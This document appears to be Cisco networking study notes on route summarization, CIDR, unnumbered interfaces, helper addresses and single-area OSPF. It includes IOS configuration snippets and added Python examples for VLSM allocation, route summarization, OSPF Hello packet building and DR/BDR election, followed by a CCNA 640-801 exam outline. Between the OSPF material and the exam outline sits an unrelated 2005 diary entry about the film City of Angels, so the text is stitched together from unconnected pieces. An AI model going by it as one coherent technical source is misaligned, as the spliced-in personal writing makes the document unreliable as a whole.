Routing protocols summarize or aggregate routes based on the shared portion of the network addresses. The classless routing protocols, OSPF and EIGRP, support summarization on subnet addresses, including VLSM addressing. The classful routing protocols, RIPv1 and IGRP, automatically summarize routes at classful network boundaries. Classful routing protocols do not support summarization at any other bit boundary, whereas classless routing protocols support summarization at any bit boundary.
Because there are fewer routing table entries, route summarization reduces router memory usage and the network traffic generated by routing protocols. For summarization to work correctly in a network, the following requirements must be met:
- the IP addresses being summarized must share the same high-order bits;
- the routing protocol must make forwarding decisions based on the 32-bit IP address and a prefix length of up to 32 bits;
- routing updates must carry the prefix length (subnet mask) together with the 32-bit IP address.
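The VLSM and route summarization sections above, as one added Python example (not part of the original notes and not Cisco code): vlsm_allocate carves a block into subnets sized for the stated host counts, and summarize computes the single prefix made of the shared high-order bits of a set of prefixes, reporting whether that summary is exact or also covers address space not in the input (the case the text warns about when blocks are not contiguous powers of two). Both function names and all sample addresses are constructed for illustration.

```python
import ipaddress
from typing import Dict, List, Tuple


def vlsm_allocate(block: str, host_counts: Dict[str, int]) -> Dict[str, str]:
    """Carve `block` into one subnet per entry of host_counts using VLSM.

    Requirements are served largest first: allocating in descending size order
    keeps every subnet aligned on its own size, so a simple cursor suffices.
    """
    net = ipaddress.ip_network(block)
    cursor = int(net.network_address)
    end = int(net.broadcast_address) + 1
    plan: Dict[str, str] = {}
    for name, hosts in sorted(host_counts.items(), key=lambda kv: (-kv[1], kv[0])):
        needed = hosts + 2                          # plus network and broadcast addresses
        size = 1 << (needed - 1).bit_length()       # smallest power of two >= needed
        prefixlen = 33 - size.bit_length()          # size == 2 ** (32 - prefixlen)
        if cursor + size > end:
            raise ValueError(f"{block} exhausted while allocating {name}")
        plan[name] = f"{ipaddress.IPv4Address(cursor)}/{prefixlen}"
        cursor += size
    return plan


def summarize(prefixes: List[str]) -> Tuple[str, bool]:
    """Shortest single prefix covering all `prefixes` (their shared high-order bits).

    Returns (summary, exact). exact is False when the summary also covers address
    space that is not in the input, i.e. when the blocks are discontiguous or do
    not add up to a power of two. Inputs are assumed not to overlap.
    """
    nets = [ipaddress.ip_network(p) for p in prefixes]
    lo = min(int(n.network_address) for n in nets)
    hi = max(int(n.broadcast_address) for n in nets)
    prefixlen = 32
    # Shorten the prefix until the lowest and highest address agree on every bit.
    while prefixlen > 0 and (lo >> (32 - prefixlen)) != (hi >> (32 - prefixlen)):
        prefixlen -= 1
    summary = ipaddress.ip_network(f"{ipaddress.IPv4Address(lo)}/{prefixlen}", strict=False)
    exact = summary.num_addresses == sum(n.num_addresses for n in nets)
    return str(summary), exact


if __name__ == "__main__":
    # Constructed requirement: four LANs inside 192.168.1.0/24.
    plan = vlsm_allocate("192.168.1.0/24", {"sales": 100, "eng": 50, "mgmt": 20, "link": 2})
    for name, subnet in plan.items():
        print(f"{name:6} {subnet}")
    print(summarize(list(plan.values())))                                  # the whole /24, not exact
    print(summarize(["172.16.0.0/24", "172.16.1.0/24", "172.16.2.0/24", "172.16.3.0/24"]))
    print(summarize(["10.1.0.0/24", "10.1.2.0/24"]))                       # discontiguous
```

The discontiguous case shows why the text insists on a proper address plan: summarizing 10.1.0.0/24 and 10.1.2.0/24 yields 10.1.0.0/22, which silently also claims 10.1.1.0/24 and 10.1.3.0/24.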

Route summarization operation on Cisco routers
Cisco manages route summarization in two ways:
- sending summary routes;
- selecting routes from summaries.

Discontiguous subnets are subnets of the same major network that are separated by a different major network.

Route summarization support by routing protocol

Protocol   Auto-summarizes at classful boundary?   Can auto-summary be disabled?   Can summarize beyond classful boundary?
RIPv1      yes                                     no                              no
RIPv2      yes                                     yes                             no
IGRP       yes                                     no                              no
EIGRP      yes                                     yes                             yes
OSPF       no                                      -                               yes


Classless interdomain routing (CIDR)

CIDR is a technique developed to help slow the growth of IP address consumption and of routing tables. The idea behind CIDR is that several class C address blocks can be combined or aggregated into a larger classless block of IP addresses (that is, one allowing more hosts). Blocks of class C addresses are allocated to the individual ISPs.


Using unnumbered IP addresses on serial interfaces
To enable IP processing on a serial interface without assigning it an explicit IP address, use the interface configuration command ip unnumbered type number. Here type number is the type and number of another interface on the router that has an assigned IP address (called the designated or reference interface, the one from which the unnumbered interface borrows its address). It cannot be another unnumbered interface. To disable IP processing on the serial interface, use the no form of the command.

Restrictions on unnumbered interfaces:
- serial interfaces using HDLC, PPP, LAPB or SLIP, and tunnel interfaces, can be unnumbered. The ip unnumbered interface configuration command cannot be used on X.25 or Switched Multimegabit Data Service (SMDS) interfaces;
- ping cannot be used to determine whether an unnumbered interface is up, because the interface has no address of its own. SNMP can monitor the interface status remotely.
Example:
interface Ethernet0
 ip address 10.1.1.1 255.255.255.0
!
interface Serial0
 ip unnumbered Ethernet0


Using helper addresses

Routers do not forward broadcasts. A helper address lets clients and servers find each other by forwarding such broadcast packets directly to the target server.

The helper-address command changes a broadcast destination address into a unicast address (or a directed broadcast, that is, a local broadcast within one subnet), so that the broadcast message can be routed to a specific destination rather than everywhere.

Use the ip helper-address address interface configuration command on an interface that may receive broadcasts. In this command address is the destination address used when forwarding User Datagram Protocol (UDP) broadcasts; it can be the unicast address of a remote server or a directed broadcast address.

When ip helper-address address is defined, forwarding is automatically enabled for 8 default UDP ports: TFTP (69), DNS (53), Time (37), NetBIOS name service (137), NetBIOS datagram service (138), BOOTP server (67), BOOTP client (68) and Terminal Access Controller Access Control System, TACACS (49).
When ip helper-address address is defined together with an ip forward-protocol udp command naming these 8 UDP ports, broadcast packets addressed to these 8 UDP ports are forwarded automatically.

ip forward-protocol keywords:

Keyword   Description
udp       UDP, the transport-layer protocol
port      (optional) when the udp keyword is given, a UDP destination port number or port name may be specified
nd        Network Disk, an old protocol used by diskless Sun workstations
sdns      SDNS, a network security protocol

Example:
interface Ethernet 0
 ip address 172.16.1.100 255.255.255.0
 ip helper-address 172.16.2.2
!
ip forward-protocol udp 3000
no ip forward-protocol udp tftp

The ip helper-address command must be configured on the router interface that receives the original client broadcast.


Chapter 3: Configuring OSPF in a Single Area
OSPF is a link-state technology, as opposed to distance-vector technologies such as the Routing Information Protocol (RIP). The OSPF protocol performs the two main functions of any routing protocol algorithm: path selection and path switching.

OSPF is an interior gateway protocol (IGP), which means it distributes routing information among routers belonging to the same autonomous system.

OSPF was written to meet the needs of large, scalable networks that RIP cannot serve. OSPF addresses the following problems:
- convergence rate
- support for variable-length subnet masks (VLSM)
OSPF and RIPv2 support VLSM; RIP supports only fixed-length subnet masks (FLSM).
- network reachability
RIP treats a destination 16 hops away as unreachable; OSPF has no theoretical reachability limit.
- bandwidth usage
RIP broadcasts its complete routing table every 30 seconds; OSPF sends updates only when a link changes.
- path selection method
RIP chooses the best path by hop count; OSPF uses a path cost value (on Cisco routers it is based on link speed) as the basis for path selection. Like RIP and IGRP, OSPF supports equal-cost paths.

OSPF messages are carried inside IP packets, using protocol number 89.
OSPF can run on broadcast or non-broadcast networks.


OSPF operation in a broadcast multi-access topology

The Hello protocol is responsible for establishing and maintaining neighbor relationships.
Hello packets are sent periodically from every interface participating in OSPF to the IP multicast address 224.0.0.5, also known as the AllSPFRouters address.

A Hello packet contains the following information:
- router ID
This 32-bit number uniquely identifies a router within an autonomous system. By default it is the highest IP address on an active interface. This identifier matters when neighbor relationships are established and when messages between the copies of the SPF algorithm running in the network are coordinated.
- hello interval and dead interval
The hello interval specifies how often (in seconds) the router sends hellos. The dead interval is the time in seconds the router waits for a message from a neighbor before declaring that neighbor down; by default it is 4 times the hello interval.
- neighbors
These are the adjacent routers with which two-way communication has been established.
- area ID
To communicate, two routers must share a common network segment.
- router priority
This 8-bit number indicates the router's priority in the election of the DR and BDR.
- IP addresses of the DR and BDR
- authentication password
- stub area flag


Fields of the OSPF packet header (length in bytes):
- version number (1)
- type (1)
Hello
link-state request
link-state update
link-state acknowledgment
- packet length (2)
- router ID (4)
- area ID (4)
- checksum (2)
- authentication type (2)
- authentication (8)
- data (variable)
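The header layout just listed and the Hello contents described above, as one added Python example (not part of the original notes and not Cisco code): build_hello assembles an OSPFv2 Hello packet with null authentication, and parse_ospf decodes the 24-byte header, verifies the checksum and, for type 1, decodes the Hello body. Two points the text states are checked in code: the checksum covers the packet except the 8-byte authentication field, and the dead interval defaults to 4 times the hello interval. Function names and all sample addresses are constructed for illustration.

```python
import ipaddress
import struct
from typing import Dict, List, Optional

OSPF_VERSION = 2
# OSPFv2 packet type codes (RFC 2328)
HELLO, DB_DESCRIPTION, LS_REQUEST, LS_UPDATE, LS_ACK = 1, 2, 3, 4, 5
HEADER_LEN = 24   # 1+1+2+4+4+2+2+8 bytes, the fields listed above


def _ip(s: str) -> bytes:
    return ipaddress.IPv4Address(s).packed


def ip_checksum(data: bytes) -> int:
    """Standard Internet (ones' complement) checksum over data."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_hello(router_id: str, area_id: str, mask: str, hello_interval: int,
                priority: int, dr: str, bdr: str, neighbors: List[str],
                dead_interval: Optional[int] = None) -> bytes:
    """Assemble an OSPFv2 Hello packet with null authentication (auth type 0)."""
    if dead_interval is None:
        dead_interval = 4 * hello_interval          # default: 4 x hello interval
    body = (_ip(mask) + struct.pack("!HBB", hello_interval, 0x02, priority)  # options: E-bit
            + struct.pack("!I", dead_interval) + _ip(dr) + _ip(bdr)
            + b"".join(_ip(n) for n in neighbors))
    length = HEADER_LEN + len(body)
    head = struct.pack("!BBH", OSPF_VERSION, HELLO, length) + _ip(router_id) + _ip(area_id)
    # The checksum covers the whole packet except the 8-byte authentication field,
    # with the checksum field itself taken as zero while computing it.
    csum = ip_checksum(head + struct.pack("!HH", 0, 0) + body)
    return head + struct.pack("!HH", csum, 0) + bytes(8) + body


def parse_ospf(pkt: bytes) -> Dict:
    """Decode the 24-byte header, verify the checksum, and decode a Hello body."""
    if len(pkt) < HEADER_LEN:
        raise ValueError("truncated OSPF header")
    version, ptype, length = struct.unpack("!BBH", pkt[:4])
    if version != OSPF_VERSION or length < HEADER_LEN or length > len(pkt):
        raise ValueError("bad OSPF version or packet length")
    checksum, auth_type = struct.unpack("!HH", pkt[12:16])
    covered = pkt[:12] + b"\x00\x00" + pkt[14:16] + pkt[HEADER_LEN:length]
    info = {
        "version": version, "type": ptype, "length": length,
        "router_id": str(ipaddress.IPv4Address(pkt[4:8])),
        "area_id": str(ipaddress.IPv4Address(pkt[8:12])),
        "checksum_ok": ip_checksum(covered) == checksum,
        "auth_type": auth_type,
        "auth": pkt[16:24],
    }
    if ptype == HELLO:
        body = pkt[HEADER_LEN:length]
        hello_interval, options, priority = struct.unpack("!HBB", body[4:8])
        info.update({
            "network_mask": str(ipaddress.IPv4Address(body[:4])),
            "hello_interval": hello_interval,
            "options": options,
            "priority": priority,
            "dead_interval": struct.unpack("!I", body[8:12])[0],
            "dr": str(ipaddress.IPv4Address(body[12:16])),
            "bdr": str(ipaddress.IPv4Address(body[16:20])),
            "neighbors": [str(ipaddress.IPv4Address(body[i:i + 4]))
                          for i in range(20, len(body), 4)],
        })
    return info


if __name__ == "__main__":
    # Constructed Hello from router 10.0.0.1 in area 0 that already sees neighbor 10.0.0.2.
    pkt = build_hello("10.0.0.1", "0.0.0.0", "255.255.255.0", 10, 1,
                      "192.0.2.1", "192.0.2.2", ["10.0.0.2"])
    print(pkt.hex())
    print(parse_ospf(pkt))
```

A parser that does not re-check the checksum accepts any corrupted or hand-edited packet; the checksum_ok flag is what a receiving router consults before it processes the Hello.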


Designated router (DR) and backup designated router (BDR)
Routers in a multi-access environment such as an Ethernet segment must elect a DR and a BDR to represent the network. While the DR is operating, the BDR performs no DR functions; it receives all the information but does not process it, and the DR carries out the forwarding and synchronization tasks. The BDR takes over the DR's work only when the DR fails.

Value of the DR and BDR:
- reduced routing update traffic
The DR and BDR act as the central point for the exchange of link-state information on a given multi-access network. Every router must establish an adjacency with the DR and BDR, and the DR sends each router's link-state information to all other routers on the multi-access network. This flooding process greatly reduces router-related traffic on the network segment.
- management of link-state synchronization
The DR and BDR ensure that the other routers on the network hold the same link-state information about the network.
An adjacency is the relationship that exists between a router and its DR and BDR. Adjacent routers have synchronized link-state databases.
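The default router ID rule and the DR/BDR election that the preceding sections describe, as an added Python example (not part of the original notes and not Cisco code). It models the initial election on a segment with no incumbent DR, with the standard rule that the highest priority wins, ties go to the highest router ID, and priority 0 makes a router ineligible; the steady-state OSPF election, which keeps an existing DR, is not modelled. Function names and the sample addresses are constructed for illustration.

```python
from typing import Dict, List, Optional, Tuple


def _octets(addr: str) -> Tuple[int, ...]:
    """Compare dotted-quad addresses numerically, not as strings ("9.0.0.1" < "10.0.0.1")."""
    return tuple(int(o) for o in addr.split("."))


def default_router_id(active_interface_addresses: List[str]) -> str:
    """Default OSPF router ID: the highest IP address on an active interface."""
    if not active_interface_addresses:
        raise ValueError("no active interface address to derive a router ID from")
    return max(active_interface_addresses, key=_octets)


def elect_dr_bdr(routers: Dict[str, int]) -> Tuple[Optional[str], Optional[str]]:
    """Initial DR/BDR election on a multi-access segment (no incumbent DR).

    routers maps router ID -> 8-bit priority. Highest priority wins; ties are
    broken by the highest router ID; priority 0 makes a router ineligible.
    """
    eligible = [(prio, _octets(rid), rid) for rid, prio in routers.items()
                if 0 < prio <= 255]
    eligible.sort(reverse=True)          # by priority, then numeric router ID
    dr = eligible[0][2] if eligible else None
    bdr = eligible[1][2] if len(eligible) > 1 else None
    return dr, bdr


if __name__ == "__main__":
    # Constructed segment: one router with a raised priority, one barred from election.
    segment = {"10.0.0.1": 1, "10.0.0.9": 1, "10.0.0.5": 0, "10.0.0.3": 200}
    print(default_router_id(["10.0.0.1", "192.168.1.1", "172.16.0.9"]))
    print(elect_dr_bdr(segment))
```

Setting priority 0 is how an access router is kept out of the election on a segment where it should never become DR or BDR.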

July 20, 2005

It is quite an old film. Back then I had only read the synopsis, which left no impression, and afterwards I never had a chance to watch it. Today I finally got to see it.

When the film ended I found my eyes were a little wet, which surprised me greatly. It seems a long time since anything moved me. The movie is really just a simple story of a human and an angel falling in love. Had it been made in China it would have become a dragon-princess tale, the Cowherd and the Weaver Girl, or the Seventh Fairy; in Andersen's fairy tales it would be the mermaid and the prince. Yet those hardly move me, even though they all end in tragedy and are all loves across a divide. Why do I say that?

I don't know how to describe my feelings, but I know I was struck by the intensely strong sense of responsibility Maggie shows at the start of the film; I was moved that Seth, whatever Maggie's past or even her present, was willing to pay the price of eternity to pursue that fleeting love; and I was inspired by Seth at the end, bravely facing a new life after bearing the pain of losing the one he loved.

What struck me, what moved me, what inspired me: all of it is so real, yet seems so far from me. It seems I never had these things, or perhaps I have always kept them sealed away? Whatever it is, I think I no longer need to look for that answer now.

I seem to have found my own direction. No, not "seem": I truly have found my own direction.

Finally, I think I should thank Nicolas Cage, Meg Ryan and Brad Silberling!

◆ Exam duration: 90 minutes.

  ◆ Number of questions: 56.

  ◆ Question types: 3 router simulation questions; a few matching questions; mostly multiple-choice and other formats.

  ◆ Exam content: Planning & Designing, Implementation & Operation, Troubleshooting and Technology, that is, network design and planning, network construction and operation, network troubleshooting, and key network technologies.

  1. Network design and planning: build a simple network using Cisco network technology

           plan an IP addressing scheme and analyze the design requirements

           choose an appropriate routing protocol based on user requirements

           build a simple access network using Cisco network technology

           configure appropriate access control lists based on user requirements

           choose appropriate WAN services based on user requirements


  2. Network construction and operation: configure an appropriate routing protocol according to user requirements

           configure IP addresses, subnet masks and gateway addresses on routers and hosts

           configure the router's auxiliary management functions

           configure VLANs and inter-switch communication on switches

           operate and implement a LAN

           configure switches in a specific network environment

           manage the operating system and device configuration files

           perform initial router configuration

           perform initial switch configuration

           implement access control lists

           implement simple WAN protocols

  3. Network troubleshooting: use knowledge of the OSI 7-layer model to guide the resolution of network faults

           troubleshoot LANs and VLANs

           resolve routing protocol problems

           resolve IP addressing and main configuration problems

           resolve device faults in an operating network

           resolve faults caused by access control lists

           perform simple WAN troubleshooting

  4. Key network technologies: describe network communication using the OSI layered model

           describe the Spanning Tree Protocol process

           compare and contrast the main characteristics of the various LAN environments

           evaluate the characteristics of routing protocols

           evaluate the TCP/IP communication process and the associated protocol suite

           describe the characteristics of network device components

           evaluate the characteristics of network device components

           evaluate packet handling rules

           evaluate the key characteristics of WANs

  According to the head of Cisco's Internet Learning Solutions Group, the newly released CCNA 640-801 exam adds CCNP topics, including OSPF, EIGRP, variable length subnet masking and advanced switching configuration. The upgraded exam does not narrow the scope: its breadth and depth are considerably greater than those of 640-607.